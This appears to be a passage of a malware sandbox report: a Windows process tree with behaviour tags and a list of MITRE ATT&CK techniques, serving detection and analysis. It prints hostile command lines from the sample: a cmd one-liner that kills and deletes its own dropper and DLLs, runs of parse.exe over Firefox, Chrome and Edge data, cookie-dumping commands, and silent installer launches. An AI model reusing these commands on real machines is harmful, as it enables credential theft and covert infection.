12⤵
PID:6536

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5132 /prefetch:8
12⤵
PID:5480

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5324 /prefetch:8
12⤵
PID:6024

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6044 /prefetch:8
12⤵
PID:5512

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6440 /prefetch:8
12⤵
PID:2828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6296 /prefetch:1
12⤵
PID:3636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6436 /prefetch:8
12⤵
PID:5980

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6696 /prefetch:8
12⤵
PID:5620

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6700 /prefetch:8
12⤵
PID:7732

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6956 /prefetch:8
12⤵
PID:5332

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6960 /prefetch:8
12⤵
PID:7640

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4384 /prefetch:8
12⤵
PID:4424

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4524 /prefetch:8
12⤵
PID:6328

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3824 /prefetch:1
12⤵
PID:2292

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3444 /prefetch:8
12⤵
PID:7608

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5464 /prefetch:8
12⤵
PID:6828

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4768 /prefetch:8
12⤵
PID:7272

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3792 /prefetch:8
12⤵
PID:7324

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=1536 /prefetch:8
12⤵
PID:8152

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4996 /prefetch:8
12⤵
PID:7180

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:1
12⤵
PID:1048

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6944 /prefetch:8
12⤵
PID:5800

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6036 /prefetch:8
12⤵
PID:5112

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2332 /prefetch:8
12⤵
PID:7772

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1776,5246059758464199734,15131981063010748122,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=3640 /prefetch:2
12⤵
PID:7416

C:\Windows\regedit.exe
regedit /s chrome-set.reg
8⤵
- Runs .reg file with regedit
PID:6872

C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
parse.exe -f json -b firefox
8⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7196

C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
parse.exe -f json -b chrome
8⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7268

C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exe
parse.exe -f json -b edge
8⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:7392

C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\Delta.exe
"C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\Delta.exe" /Verysilent
4⤵
- Suspicious use of SetWindowsHookEx
PID:5720

C:\Users\Admin\AppData\Local\Temp\is-OBBOP.tmp\Delta.tmp
"C:\Users\Admin\AppData\Local\Temp\is-OBBOP.tmp\Delta.tmp" /SL5="$20500,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\Delta.exe" /Verysilent
5⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:4408

C:\Users\Admin\AppData\Local\Temp\is-2STRJ.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-2STRJ.tmp\Setup.exe" /VERYSILENT
6⤵
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of SetWindowsHookEx
PID:5364

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im Setup.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\is-2STRJ.tmp\Setup.exe" & del C:\ProgramData\*.dll & exit
7⤵
PID:7864

C:\Windows\SysWOW64\taskkill.exe
taskkill /im Setup.exe /f
8⤵
- Kills process with taskkill
PID:8120

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
8⤵
- Delays execution with timeout.exe
PID:5488

C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\zznote.exe
"C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\zznote.exe" /Verysilent
4⤵
- Suspicious use of SetWindowsHookEx
PID:4988

C:\Users\Admin\AppData\Local\Temp\is-1JOCA.tmp\zznote.tmp
"C:\Users\Admin\AppData\Local\Temp\is-1JOCA.tmp\zznote.tmp" /SL5="$30500,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\zznote.exe" /Verysilent
5⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
PID:5304

C:\Users\Admin\AppData\Local\Temp\is-QFMIO.tmp\jg4_4jaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-QFMIO.tmp\jg4_4jaa.exe" /silent
6⤵
- Checks whether UAC is enabled
- Suspicious use of SetWindowsHookEx
PID:6968

C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\hjjgaa.exe
"C:\Users\Admin\AppData\Local\Temp\is-20TBG.tmp\hjjgaa.exe" /Verysilent
4⤵
- Suspicious use of SetWindowsHookEx
PID:6360

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Suspicious use of SetWindowsHookEx
PID:2964

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Suspicious use of SetWindowsHookEx
PID:8004

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:2412

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
PID:4812

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c echo grYNxrw
1⤵
PID:5272

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:1000

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5260

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:6980

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies Internet Explorer settings
PID:4800

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:4940

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5292

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:4608

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
PID:428

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious use of SetWindowsHookEx
PID:7284

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s DeviceInstall
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:5512

C:\Windows\system32\DrvInst.exe
DrvInst.exe "4" "0" "C:\Users\Admin\AppData\Local\Temp\{1f355c33-6713-244a-bcdc-9f6568dda612}\oemvista.inf" "9" "4d14a44ff" "00000000000000A4" "WinSta0\Default" "0000000000000178" "208" "c:\program files (x86)\maskvpn\driver\win764"
2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Modifies data under HKEY_USERS
PID:5456

C:\Windows\system32\DrvInst.exe
DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem2.inf" "oemvista.inf:3beb73aff103cc24:tap0901.ndi:9.0.0.21:tap0901," "4d14a44ff" "00000000000000A4"
2⤵
PID:7836

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:6588

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s DsmSvc
1⤵
- Checks SCSI registry key(s)
PID:6544

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s NetSetupSvc
1⤵
PID:7848

C:\Program Files (x86)\MaskVPN\mask_svc.exe
"C:\Program Files (x86)\MaskVPN\mask_svc.exe"
1⤵
- Loads dropped DLL
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Modifies data under HKEY_USERS
PID:4636

C:\Program Files (x86)\MaskVPN\MaskVPNUpdate.exe
MaskVPNUpdate.exe /silent
2⤵
- Drops file in Drivers directory
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks SCSI registry key(s)
PID:7836

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
PID:5476

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdge.exe" -ServerName:MicrosoftEdge.AppXdnhjhccw3zf0j06tkg3jtqr00qdm0khc.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6456

C:\Windows\system32\browser_broker.exe
C:\Windows\system32\browser_broker.exe -Embedding
1⤵
- Modifies Internet Explorer settings
PID:5204

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:7428

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7868

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
PID:6976

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:8056

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6564

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7356

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7856

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:7016

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:3636

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler --user-data-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\Crashpad --metrics-dir=C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99 --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=86.0.4240.111 --initial-client-data=0xec,0xf0,0xf4,0xc8,0xf8,0x7ffb56fa6e00,0x7ffb56fa6e10,0x7ffb56fa6e20
1⤵
PID:8772

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:8936

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:9148

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:612

C:\Windows\system32\AUDIODG.EXE
C:\Windows\system32\AUDIODG.EXE 0x2e0
1⤵
PID:8784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:2832

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6028

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:6804

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:10168

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:5404

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9300

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10968

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:11052

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:10632

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10156

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:9876

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:10796

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:2240

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
PID:4008

C:\Windows\system32\compattelrunner.exe
C:\Windows\system32\compattelrunner.exe -m:aeinv.dll -f:UpdateSoftwareInventoryW
1⤵
PID:6384

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Command-Line Interface

T1059

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Bootkit

T1067

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Disabling Security Tools

T1089

Modify Registry

Virtualization/Sandbox Evasion

T1497

Impair Defenses

T1562

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Software Discovery

T1518

Query Registry

Virtualization/Sandbox Evasion

T1497

System Information Discovery

Security Software Discovery

T1063

Peripheral Device Discovery